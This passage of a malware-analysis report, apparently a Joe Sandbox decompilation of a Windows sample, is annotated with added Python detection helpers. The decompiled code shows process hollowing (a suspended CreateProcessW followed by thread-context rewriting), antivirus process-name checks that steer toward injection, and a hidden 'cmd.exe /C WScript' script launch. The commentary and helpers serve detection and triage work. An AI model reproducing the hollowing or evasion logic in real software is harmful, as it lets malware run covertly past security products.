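    optional header with only the fields read above filled in. No sections."""
    dos = bytearray(0x40)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, E_LFANEW_OFFSET, e_lfanew)
    stub = bytes(e_lfanew - len(dos))
    opt_size = 0xF0 if pe32plus else 0xE0   # sizeof IMAGE_OPTIONAL_HEADER64 / 32
    file_header = struct.pack(FILE_HEADER_FMT, 0x8664 if pe32plus else 0x14C,
                              1, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<I", opt, 16, entry_rva)
    if pe32plus:
        struct.pack_into("<Q", opt, 24, image_base)
    else:
        struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<I", opt, 56, size_of_image)
    return bytes(dos) + stub + struct.pack("<I", IMAGE_NT_SIGNATURE) + file_header + bytes(opt)


if __name__ == "__main__":
    print(locate_nt_headers(build_minimal_pe()))
```

When triaging a dump like the one this report decompiles, running this parser over the bytes at the checked address tells you immediately whether the payload is present in the clear or is decoded only at runtime; the decompiler's own annotations on the routine below suggest the latter for this dump.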

C-Code - Quality: 84%
			E01465B80(void* __ebx, void* __ecx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void _v28;
				long _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				char _v112;
				struct _CONTEXT _v828;
				intOrPtr _t62;
				void* _t70;
				void* _t72;
				void* _t81;
				void* _t82;
				void* _t84;
				signed int _t85;
				void* _t90;
				void* _t94;
				void* _t95;
				void* _t108;
				void* _t115;
				void* _t117;
				void _t120;
				intOrPtr _t123;
				void* _t126;
				void* _t132;
				void* _t133;
				intOrPtr* _t136;
				void* _t137;
				void* _t138;
				void* _t142;
				void* _t143;

				_t115 = __ebx;
				// Zero the CONTEXT from Dr0 onwards: 0x2c8 = sizeof(CONTEXT) on x86 (0x2cc) minus the 4-byte ContextFlags set explicitly below.
				E01461BB0( &(_v828.Dr0), 0, 0x2c8);
				_v28 = 0;
				_t138 = _t137 + 0xc;
				_v32 = 0;
				// 0x10007 = CONTEXT_FULL on x86 (CONTEXT_i386 | CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS): the flags handed to Get/SetThreadContext to read or rewrite a thread's general registers.
				_v828.ContextFlags = 0x10007;
				// Embedded image at 0x146c038: test IMAGE_DOS_HEADER.e_magic against 'MZ' (0x5a4d). The decompiler's dump-time annotation (0x6b7d, non-zero) shows the bytes were not 'MZ' in this memory dump, so the payload is presumably written or decoded there at runtime.
				_t142 =  *0x146c038 - 0x5a4d; // 0x6b7d
				if(_t142 == 0) {
					L3:
					// 0x146c074 = 0x146c038 + 0x3c, i.e. e_lfanew of the embedded image; it is added to the base with no bounds check.
					_t62 =  *0x146c074; // 0x383538b7
					// IMAGE_NT_HEADERS.Signature must be 'PE\0\0' (0x4550); _t126 then points at the NT headers.
					__eflags =  *((intOrPtr*)(_t62 + 0x146c038)) - 0x4550;
					_t6 = _t62 + 0x146c038; // 0x397bf8ef
					_t126 = _t6;
					if( *((intOrPtr*)(_t62 + 0x146c038)) != 0x4550) {
						L27:
						__eflags = 0;
						return 0;
					} else {
						// Zero a 0x44-byte STARTUPINFOA (_v112, cb set to sizeof) and a 0x10-byte PROCESS_INFORMATION (_v20).
						E01461670( &_v112, 0, 0x44);
						E01461670( &_v20, 0, 0x10);
						_v112 = 0x44;
						__eflags =  *0x1631bb8;
						// Pushed right to left, these match the tail of a CreateProcess argument list (inferred; the call itself lies outside this excerpt):
						// lpProcessInformation, lpStartupInfo, lpCurrentDirectory = NULL, lpEnvironment = NULL, then dwCreationFlags.
						_push( &_v20);
						_push( &_v112);
						_push(0);
						_push(0);
						if( *0x1631bb8 == 0) {
							// 0x14 = CREATE_SUSPENDED (0x4) | CREATE_NEW_CONSOLE (0x10): the new process starts suspended so its primary thread's context and memory can be replaced before it ever runs.
							_push(0x14);
                                                                                                        						} else {
                                                                                                        							_push(0x800000c);
                                                                                                        						}
                                                                                                        						_t70 = CreateProcessW(0, _a4, 0, 0, 0, ??, ??, ??, ??, ??);
                                                                                                        						__eflags = _t70;
                                                                                                        						if(_t70 == 0) {
                                                                                                        							goto L27;
                                                                                                        						} else {
                                                                                                        							_push(_t115);
                                                                                                        							_t72 = GetThreadContext(_v16,  &_v828);
                                                                                                        							__eflags = _t72;
                                                                                                        							if(_t72 == 0) {
                                                                                                        								L26:
                                                                                                        								TerminateProcess(_v20, 0);
                                                                                                        								CloseHandle(_v16);
                                                                                                        								CloseHandle(_v20);
                                                                                                        								__eflags = 0;
                                                                                                        								return 0;
                                                                                                        							} else {
                                                                                                        								_t81 = ReadProcessMemory(_v20, _v828.Ebx + 8,  &_v28, 4,  &_v32);
                                                                                                        								__eflags = _t81;
                                                                                                        								if(_t81 == 0) {
                                                                                                        									goto L26;
                                                                                                        								} else {
                                                                                                        									_t123 =  *((intOrPtr*)(_t126 + 0x34));
                                                                                                        									_t120 = _v28;
                                                                                                        									__eflags = _t120 - _t123;
                                                                                                        									if(__eflags < 0) {
                                                                                                        										L13:
                                                                                                        										_t82 = E014672C0(__eflags, _v20,  *((intOrPtr*)(_t126 + 0x34)), 0,  *((intOrPtr*)(_t126 + 0x50)), 0x3000, 0x40);
                                                                                                        										_t132 = _t82;
                                                                                                        										_v24 = _t132;
                                                                                                        										__eflags = _t132;
                                                                                                        										if(_t132 == 0) {
                                                                                                        											goto L26;
                                                                                                        										} else {
                                                                                                        											asm("cdq");
                                                                                                        											_t124 =  &_v36;
                                                                                                        											_v44 = _t82;
                                                                                                        											_v40 = _t123;
                                                                                                        											_t84 = E014674D0(_t82,  &_v36, _v20, _t82, _t123, 0x146c038,  *((intOrPtr*)(_t126 + 0x54)),  &_v36);
                                                                                                        											__eflags = _t84;
                                                                                                        											if(_t84 == 0) {
                                                                                                        												goto L26;
                                                                                                        											} else {
                                                                                                        												_t85 =  *(_t126 + 0x14) & 0x0000ffff;
                                                                                                        												_t117 = 0;
                                                                                                        												__eflags = 0 -  *(_t126 + 6);
                                                                                                        												if(0 >=  *(_t126 + 6)) {
                                                                                                        													L20:
                                                                                                        													_t42 = _t126 + 0x34; // 0x397bf923
                                                                                                        													_t90 = E014674D0(0, _t124, _v20, _v828.Ebx + 8, 0, _t42, 4,  &_v36);
                                                                                                        													__eflags = _t90;
                                                                                                        													if(_t90 == 0) {
                                                                                                        														goto L26;
                                                                                                        													} else {
                                                                                                        														_v828.Eax =  *((intOrPtr*)(_t126 + 0x28)) + _t132;
                                                                                                        														_t94 = SetThreadContext(_v16,  &_v828);
                                                                                                        														__eflags = _t94;
                                                                                                        														if(_t94 == 0) {
                                                                                                        															goto L26;
                                                                                                        														} else {
                                                                                                        															_t95 = E014671A0(0, _t124, _v16);
                                                                                                        															__eflags = _t95;
                                                                                                        															if(_t95 == 0) {
                                                                                                        																goto L26;
                                                                                                        															} else {
                                                                                                        																Sleep(0x1388);
                                                                                                        																_t133 = VirtualAlloc(0, 0x138, 0x3000, 4);
                                                                                                        																__eflags = _t133;
                                                                                                        																if(_t133 != 0) {
                                                                                                        																	E01461BB0(_t133, 0, 0x138);
                                                                                                        																	E014674D0(0, _t124, _v20, _v44, _v40, _t133, 0x138,  &_v24);
                                                                                                        																	VirtualFree(_t133, 0, 0x8000);
                                                                                                        																}
                                                                                                        																CloseHandle(_v16);
                                                                                                        																CloseHandle(_v20);
                                                                                                        																return _v12;
                                                                                                        															}
                                                                                                        														}
                                                                                                        													}
                                                                                                        												} else {
                                                                                                        													_t34 = _t126 + 0x2c; // 0x397bf91b
                                                                                                        													_t136 = _t34 + _t85;
                                                                                                        													asm("o16 nop [eax+eax]");
                                                                                                        													while(1) {
                                                                                                        														_t108 = E014674D0(0, _t124, _v20,  *((intOrPtr*)(_t136 - 8)) + _v24, 0,  *_t136 + 0x146c038,  *((intOrPtr*)(_t136 - 4)), 0);
                                                                                                        														__eflags = _t108;
                                                                                                        														if(_t108 == 0) {
                                                                                                        															goto L26;
                                                                                                        														}
                                                                                                        														_t117 = _t117 + 1;
                                                                                                        														_t136 = _t136 + 0x28;
                                                                                                        														__eflags = _t117 - ( *(_t126 + 6) & 0x0000ffff);
                                                                                                        														if(_t117 < ( *(_t126 + 6) & 0x0000ffff)) {
                                                                                                        															continue;
                                                                                                        														} else {
                                                                                                        															_t132 = _v24;
                                                                                                        															goto L20;
                                                                                                        														}
                                                                                                        														goto L28;
                                                                                                        													}
                                                                                                        													goto L26;
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        									} else {
                                                                                                        										__eflags = _t120 -  *((intOrPtr*)(_t126 + 0x50)) + _t123;
                                                                                                        										if(__eflags > 0) {
                                                                                                        											goto L13;
                                                                                                        										} else {
                                                                                                        											__eflags = E01467120(_t123, _v20, _t120, 0);
                                                                                                        											if(__eflags != 0) {
                                                                                                        												goto L26;
                                                                                                        											} else {
                                                                                                        												goto L13;
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					E01461CE0("0125789244697858", 0x10, 0x146c038, 0xe7c00);
                                                                                                        					_t138 = _t138 + 0x10;
                                                                                                        					_t143 =  *0x146c038 - 0x5a4d; // 0x6b7d
                                                                                                        					if(_t143 == 0) {
                                                                                                        						goto L3;
                                                                                                        					} else {
                                                                                                        						return 0;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L28:
                                                                                                        			}
                                                                                                        0x01465d5e
                                                                                                        0x01465d60
                                                                                                        0x00000000
                                                                                                        0x01465d62
                                                                                                        0x01465d62
                                                                                                        0x00000000
                                                                                                        0x01465d62
                                                                                                        0x00000000
                                                                                                        0x01465d60
                                                                                                        0x00000000
                                                                                                        0x01465d30
                                                                                                        0x01465d23
                                                                                                        0x01465d11
                                                                                                        0x01465cae
                                                                                                        0x01465cb3
                                                                                                        0x01465cb5
                                                                                                        0x00000000
                                                                                                        0x01465cb7
                                                                                                        0x01465cc2
                                                                                                        0x01465cc4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01465cc4
                                                                                                        0x01465cb5
                                                                                                        0x01465cac
                                                                                                        0x01465c9e
                                                                                                        0x01465c79
                                                                                                        0x01465c60
                                                                                                        0x01465bc6
                                                                                                        0x01465bd7
                                                                                                        0x01465bdc
                                                                                                        0x01465bdf
                                                                                                        0x01465be6
                                                                                                        0x00000000
                                                                                                        0x01465be8
                                                                                                        0x01465bee
                                                                                                        0x01465bee
                                                                                                        0x01465be6
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000014,00000000,00000000,00000044,?,?,?,?,?,?,014649E6), ref: 01465C58
                                                                                                        • GetThreadContext.KERNEL32(014649E6,00010007,00000000,?,?,?,?,?,014649E6,?,?,?), ref: 01465C71
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,014649E6,?,?,?), ref: 01465C96
                                                                                                        • SetThreadContext.KERNEL32(014649E6,00010007,?,?,00000000,397BF923,00000004,00000000,?,00000000,?,0146C038,?,00000000,?,?), ref: 01465DA0
                                                                                                        • Sleep.KERNEL32(00001388,014649E6,?,0146C038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 01465DBF
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004,?,0146C038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 01465DD3
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,014649E6,00000000,00000138,?,?,00003000,00000040), ref: 01465E0F
                                                                                                        • CloseHandle.KERNEL32(014649E6,?,0146C038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 01465E1E
                                                                                                        • CloseHandle.KERNEL32(?,?,0146C038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 01465E23
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseContextHandleProcessThreadVirtual$AllocCreateFreeMemoryReadSleep
                                                                                                        • String ID: 0125789244697858$D
                                                                                                        • API String ID: 1428767187-3232960292
                                                                                                        • Opcode ID: 1888e36219e5541789a3cce8130b5b3a3536d0f2db1fbd84d212827a6935d789
                                                                                                        • Instruction ID: 83ca7352130f6704b683d03c8413d5eb356d62c219a97476855fd11a72ce4bf5
                                                                                                        • Opcode Fuzzy Hash: 1888e36219e5541789a3cce8130b5b3a3536d0f2db1fbd84d212827a6935d789
                                                                                                        • Instruction Fuzzy Hash: 0B81B271A40215BBEF209B94DC45FEEBBBCFB14748F044156FA04FA1A0E7B1A950CB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 78%
                                                                                                        			E01466A40(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                        				WCHAR* _v8;
                                                                                                        				struct _PROCESS_INFORMATION _v24;
                                                                                                        				struct _STARTUPINFOW _v92;
                                                                                                        				char _v612;
                                                                                                        				char _v740;
                                                                                                        				short _v1780;
                                                                                                        				char _v5876;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* _t38;
                                                                                                        				int _t48;
                                                                                                        				void* _t54;
                                                                                                        				void* _t61;
                                                                                                        				void* _t62;
                                                                                                        				void* _t63;
                                                                                                        				void* _t64;
                                                                                                        				void* _t65;
                                                                                                        				void* _t66;
                                                                                                        				void* _t67;
                                                                                                        				void* _t68;
                                                                                                        				void* _t70;
                                                                                                        				void* _t71;
                                                                                                        				void* _t76;
                                                                                                        				signed int _t79;
                                                                                                        				void* _t80;
                                                                                                        				void* _t81;
                                                                                                        				void* _t82;
                                                                                                        				void* _t84;
                                                                                                        
                                                                                                        				_t71 = __ecx;
                                                                                                        				E01461BB0( &_v5876, 0, 0x1000);
                                                                                                        				_v8 = 0;
                                                                                                        				E01461BB0( &_v740, 0, 0x288);
                                                                                                        				E01461670( &_v740, 0, 0x288);
                                                                                                        				_t74 = _a4;
                                                                                                        				E01461A00( &_v612, _a4);
                                                                                                        				_t38 = E01467ED0(_a4);
                                                                                                        				_t82 = _t81 + 0x30;
                                                                                                        				if(_t38 == 0) {
                                                                                                        					return _t38;
                                                                                                        				}
                                                                                                        				_push(_t68);
                                                                                                        				_push(_t76);
                                                                                                        				if(E01468DD0() == 0) {
                                                                                                        					L22:
                                                                                                        					E01461BB0( &_v92, 0, 0x44);
                                                                                                        					asm("xorps xmm0, xmm0");
                                                                                                        					asm("movups [ebp-0x14], xmm0");
                                                                                                        					E01461A00( &_v1780, L"cmd.exe /C WScript \"");
                                                                                                        					E01461970( &_v1780, _t74);
                                                                                                        					E01461970( &_v1780, "\"");
                                                                                                        					_t48 = E01467ED0(_t74);
                                                                                                        					if(_t48 != 0) {
                                                                                                        						CreateProcessW(0,  &_v1780, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
                                                                                                        						CloseHandle(_v24.hThread);
                                                                                                        						_t48 = CloseHandle(_v24);
                                                                                                        					}
                                                                                                        					L24:
                                                                                                        					return _t48;
                                                                                                        				}
                                                                                                        				_t54 = E01467EF0("bdagent.exe");
                                                                                                        				_t84 = _t82 + 4;
                                                                                                        				if(_t54 != 0) {
                                                                                                        					L10:
                                                                                                        					_push(0x1000);
                                                                                                        					_push( &_v5876);
                                                                                                        					if( *0x1631314 == 0) {
                                                                                                        						_push(0);
                                                                                                        						_t48 = E014629E0( &_v740, 0x1460000, E014680E0(_t68, _t74, _t76),  &_v740, 0x288,  &_v8, E01466CA0);
                                                                                                        						_t82 = _t84 + 0x24;
                                                                                                        						if(_t48 == 0 || _v8 == 0) {
                                                                                                        							goto L22;
                                                                                                        						} else {
                                                                                                        							goto L24;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_push(1);
                                                                                                        					_t70 = E014680E0(_t68, _t74, _t76);
                                                                                                        					_t82 = _t84 + 0xc;
                                                                                                        					if(_t70 == 0) {
                                                                                                        						goto L22;
                                                                                                        					}
                                                                                                        					_t79 = 0;
                                                                                                        					if(_t70 == 0) {
                                                                                                        						goto L22;
                                                                                                        					}
                                                                                                        					do {
                                                                                                        						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == 0) {
                                                                                                        							goto L18;
                                                                                                        						}
                                                                                                        						_t75 =  *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0));
                                                                                                        						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == GetCurrentProcessId()) {
                                                                                                        							goto L18;
                                                                                                        						}
                                                                                                        						_t48 = E014629E0(_t71, 0x1460000, _t75,  &_v740, 0x288,  &_v8, E01466CA0);
                                                                                                        						_t82 = _t82 + 0x18;
                                                                                                        						if(_t48 != 0 && _v8 != 0) {
                                                                                                        							goto L24;
                                                                                                        						}
                                                                                                        						L18:
                                                                                                        						_t79 = _t79 + 1;
                                                                                                        					} while (_t79 < _t70);
                                                                                                        					_t74 = _a4;
                                                                                                        					goto L22;
                                                                                                        				}
                                                                                                        				_t61 = E01467EF0("vsserv.exe");
                                                                                                        				_t84 = _t84 + 4;
                                                                                                        				if(_t61 != 0) {
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        				_t62 = E01467EF0("cfp.exe");
                                                                                                        				_t84 = _t84 + 4;
                                                                                                        				if(_t62 != 0) {
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        				_t63 = E01467EF0("ccavsrv.exe");
                                                                                                        				_t84 = _t84 + 4;
                                                                                                        				if(_t63 != 0) {
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        				_t64 = E01467EF0("cmdagent.exe");
                                                                                                        				_t84 = _t84 + 4;
                                                                                                        				if(_t64 != 0) {
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        				_t65 = E01467EF0("avp.exe");
                                                                                                        				_t84 = _t84 + 4;
                                                                                                        				if(_t65 != 0) {
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        				_t66 = E01467EF0("avpui.exe");
                                                                                                        				_t84 = _t84 + 4;
                                                                                                        				if(_t66 != 0) {
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        				_t67 = E01467EF0("ksde.exe");
                                                                                                        				_t82 = _t84 + 4;
                                                                                                        				if(_t67 == 0) {
                                                                                                        					goto L22;
                                                                                                        				}
                                                                                                        				goto L10;
                                                                                                        			}
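Two behaviours in this section are worth turning into checks. The "APIs" list for the function at 0x01465bc6 shows CreateProcessW with dwCreationFlags 0x14 (CREATE_SUSPENDED | CREATE_NEW_CONSOLE), then GetThreadContext and SetThreadContext with 0x10007 (CONTEXT_FULL on x86) on the new thread, with a 4-byte ReadProcessMemory in between: the RunPE / process-hollowing sequence. E01466A40 above looks for Bitdefender, Comodo and Kaspersky process names, tries to inject into another running process when one is present, and otherwise launches the dropped script with CreateProcessW(..., 0x08000000 = CREATE_NO_WINDOW, ...) and the command line cmd.exe /C WScript "<path>". The script below is an added example, not code from the sample or from Joe Sandbox. It parses the API lines copied from the report, decodes the creation flags, flags the hollowing sequence, matches the hidden WScript launcher on a constructed command line (the report does not show the script path), and models the AV-name branch; the E01468DD0 gate and the global at 0x1631314 are not modelled.

```python
# Added example for this report section; not code from the sample or from
# Joe Sandbox. Checks derived from the behaviours visible above:
#  (a) the API list at ref 01465C58..01465DA0: CreateProcessW with
#      dwCreationFlags 0x14 (CREATE_SUSPENDED | CREATE_NEW_CONSOLE), then
#      GetThreadContext / ReadProcessMemory / SetThreadContext on the new
#      primary thread, i.e. the RunPE / process-hollowing pattern;
#  (b) E01466A40's fallback: CreateProcessW(..., 0x08000000 = CREATE_NO_WINDOW,
#      ...) with the command line  cmd.exe /C WScript "<path>".
import re

CREATE_SUSPENDED = 0x00000004
CREATE_NEW_CONSOLE = 0x00000010
CREATE_NO_WINDOW = 0x08000000
FLAG_NAMES = {
    CREATE_SUSPENDED: "CREATE_SUSPENDED",
    CREATE_NEW_CONSOLE: "CREATE_NEW_CONSOLE",
    CREATE_NO_WINDOW: "CREATE_NO_WINDOW",
}

# The four relevant lines, copied from the "APIs" list in this section.
API_LINES = [
    "• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000014,00000000,00000000,00000044,?,?,?,?,?,?,014649E6), ref: 01465C58",
    "• GetThreadContext.KERNEL32(014649E6,00010007,00000000,?,?,?,?,?,014649E6,?,?,?), ref: 01465C71",
    "• ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,014649E6,?,?,?), ref: 01465C96",
    "• SetThreadContext.KERNEL32(014649E6,00010007,?,?,00000000,397BF923,00000004,00000000,?,00000000,?,0146C038,?,00000000,?,?), ref: 01465DA0",
]

# Process names E01466A40 looks for before choosing the injection branch.
AV_PROCESS_NAMES = {"bdagent.exe", "vsserv.exe", "cfp.exe", "ccavsrv.exe",
                    "cmdagent.exe", "avp.exe", "avpui.exe", "ksde.exe"}

API_RE = re.compile(r"•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)")
HEX_RE = re.compile(r"[0-9A-Fa-f]+")


def parse_api_line(line):
    """Parse one '• Api.MODULE(args), ref: ADDR' line; '?' arguments become None."""
    m = API_RE.search(line)
    if not m:
        return None
    name, module, argstr, ref = m.groups()
    args = [int(a, 16) if HEX_RE.fullmatch(a.strip()) else None
            for a in argstr.split(",")]
    return {"api": name, "module": module, "args": args, "ref": int(ref, 16)}


def decode_creation_flags(flags):
    return [name for bit, name in FLAG_NAMES.items() if flags & bit]


def detect_hollowing(lines):
    """Flag a suspended CreateProcessW followed by thread-context manipulation.

    Calls are ordered by their 'ref' address, the call-site order the report
    lists for a single function."""
    calls = sorted((c for c in map(parse_api_line, lines) if c), key=lambda c: c["ref"])
    create, sequence = None, []
    for c in calls:
        if c["api"] == "CreateProcessW" and len(c["args"]) > 5 and c["args"][5] is not None:
            if c["args"][5] & CREATE_SUSPENDED:  # dwCreationFlags is the 6th argument
                create = c
        elif create and c["api"] in ("GetThreadContext", "ReadProcessMemory",
                                     "WriteProcessMemory", "SetThreadContext",
                                     "ResumeThread"):
            sequence.append(c["api"])
    return {
        "hollowing": create is not None and {"GetThreadContext", "SetThreadContext"} <= set(sequence),
        "creation_flags": decode_creation_flags(create["args"][5]) if create else [],
        "sequence": sequence,
    }


LAUNCHER_RE = re.compile(r'^cmd\.exe\s+/c\s+wscript\s+"([^"]+)"\s*$', re.IGNORECASE)


def detect_script_launcher(cmdline, creation_flags):
    """Match the cmd.exe /C WScript "<file>" launcher; 'hidden' means CREATE_NO_WINDOW is set."""
    m = LAUNCHER_RE.match(cmdline.strip())
    if not m:
        return None
    return {"script": m.group(1), "hidden": bool(creation_flags & CREATE_NO_WINDOW)}


def choose_branch(running_process_names):
    """Simplified model of E01466A40's decision (the E01468DD0 gate and the
    global at 0x1631314 are not modelled): with one of the listed AV processes
    running it tries to inject into another process, otherwise it spawns WScript."""
    names = {n.lower() for n in running_process_names}
    return "inject_into_running_process" if names & AV_PROCESS_NAMES else "spawn_hidden_wscript"


if __name__ == "__main__":
    print(detect_hollowing(API_LINES))
    # Constructed command line; the report does not show the dropped script's path.
    print(detect_script_launcher('cmd.exe /C WScript "C:\\ProgramData\\update.js"', CREATE_NO_WINDOW))
    print(choose_branch({"explorer.exe", "avp.exe"}))
```

The ordering by ref matters: a GetThreadContext before the suspended CreateProcessW (for example on the caller's own thread) should not count, and the rule only fires once both a read and a write of the new thread's context follow the suspended create. WriteProcessMemory and ResumeThread are accepted in the sequence because full RunPE implementations use them, even though this function's list does not show them.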
(Per-line instruction address column for E01466A40, starting at 0x01466a40, collapsed.)
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466c02
                                                                                                        0x01466b5b
                                                                                                        0x01466b62
                                                                                                        0x01466b64
                                                                                                        0x01466b69
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466b6f
                                                                                                        0x01466b73
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466b80
                                                                                                        0x01466b88
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466b8a
                                                                                                        0x01466b99
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466bb6
                                                                                                        0x01466bbb
                                                                                                        0x01466bc0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466bcc
                                                                                                        0x01466bcc
                                                                                                        0x01466bcd
                                                                                                        0x01466bd1
                                                                                                        0x00000000
                                                                                                        0x01466bd1
                                                                                                        0x01466ad0
                                                                                                        0x01466ad5
                                                                                                        0x01466ada
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466ae1
                                                                                                        0x01466ae6
                                                                                                        0x01466aeb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466af2
                                                                                                        0x01466af7
                                                                                                        0x01466afc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466b03
                                                                                                        0x01466b08
                                                                                                        0x01466b0d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466b14
                                                                                                        0x01466b19
                                                                                                        0x01466b1e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466b25
                                                                                                        0x01466b2a
                                                                                                        0x01466b2f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466b36
                                                                                                        0x01466b3b
                                                                                                        0x01466b40
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                          • Part of subcall function 01467ED0: GetFileAttributesW.KERNEL32(?,?,014631D3,014647C4,014647C4,\System32\wuapp.exe,014647C4,?,00000000), ref: 01467ED6
                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 01466B91
                                                                                                          • Part of subcall function 01467EF0: Process32First.KERNEL32(00000000,00000128,00000001,00000002,00000000,?), ref: 01467F24
                                                                                                          • Part of subcall function 01467EF0: Process32Next.KERNEL32(00000000,00000128,00000000,?), ref: 01467F48
                                                                                                          • Part of subcall function 01467EF0: Process32Next.KERNEL32(00000000,00000128,00000000,00000128,00000000,?), ref: 01467F6D
                                                                                                          • Part of subcall function 01467EF0: CloseHandle.KERNEL32(00000000,00000000,00000128,00000000,?), ref: 01467F77
                                                                                                          • Part of subcall function 01467EF0: CloseHandle.KERNEL32(00000000,00000000,?), ref: 01467F86
                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 01466C7E
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,7519F7F0,00000000), ref: 01466C8D
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,7519F7F0,00000000), ref: 01466C92
                                                                                                          • Part of subcall function 01467EF0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?), ref: 01467F08
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$Process32$CreateNextProcess$AttributesCurrentFileFirstSnapshotToolhelp32
                                                                                                        • String ID: avp.exe$avpui.exe$bdagent.exe$ccavsrv.exe$cfp.exe$cmd.exe /C WScript "$cmdagent.exe$ksde.exe$vsserv.exe
                                                                                                        • API String ID: 3996573972-1880040858
                                                                                                        • Opcode ID: c20cffdb15bde1cc34bb655f65a096c5d7382ae691206741b99ae0934b4a9c93
                                                                                                        • Instruction ID: be0905a17e116e2e62ad5d00dd1904d760618804268db7c6d9412401662ceb9d
                                                                                                        • Opcode Fuzzy Hash: c20cffdb15bde1cc34bb655f65a096c5d7382ae691206741b99ae0934b4a9c93
                                                                                                        • Instruction Fuzzy Hash: 6A510D71D4030666FB209B92DD45FAB726D9B60B8CF15006BEA04B21B1FBB1EA448663
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 81%
                                                                                                        			E01465E60(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				void* _v24;
                                                                                                        				intOrPtr _v32;
                                                                                                        				void* _v36;
                                                                                                        				void* _v40;
                                                                                                        				char _v44;
                                                                                                        				char _v48;
                                                                                                        				signed int _v56;
                                                                                                        				char _v60;
                                                                                                        				char _v132;
                                                                                                        				intOrPtr _v1232;
                                                                                                        				intOrPtr _v1236;
                                                                                                        				intOrPtr _v1240;
                                                                                                        				intOrPtr _v1244;
                                                                                                        				intOrPtr _v1324;
                                                                                                        				char _v1372;
                                                                                                        				signed int _t99;
                                                                                                        				int _t107;
                                                                                                        				void* _t109;
                                                                                                        				void* _t116;
                                                                                                        				intOrPtr _t117;
                                                                                                        				signed int _t118;
                                                                                                        				signed int _t122;
                                                                                                        				void* _t132;
                                                                                                        				void* _t145;
                                                                                                        				void* _t151;
                                                                                                        				void* _t153;
                                                                                                        				void* _t154;
                                                                                                        				signed int _t159;
                                                                                                        				void* _t173;
                                                                                                        				intOrPtr _t174;
